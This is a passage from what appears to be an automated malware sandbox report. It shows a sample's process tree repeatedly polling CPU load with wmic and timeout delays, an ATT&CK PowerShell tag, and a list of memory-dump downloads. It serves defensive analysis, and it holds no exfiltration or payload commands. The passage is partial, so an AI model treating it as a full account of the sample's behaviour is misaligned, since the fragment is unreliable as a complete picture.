PID:2828

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2480

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2088

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:744

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1968

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2756

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2772

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2808

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2020

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2200

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2016

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:556

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2156

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:304

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1060

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1596

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1552

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2236

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2272

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:944

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1288

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2136-4-0x000007FEF5D1E000-0x000007FEF5D1F000-memory.dmp

Filesize
4KB

Download
memory/2136-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2136-6-0x0000000002050000-0x0000000002058000-memory.dmp

Filesize
32KB

Download
memory/2136-7-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2136-8-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2136-9-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2136-10-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2136-11-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2136-12-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download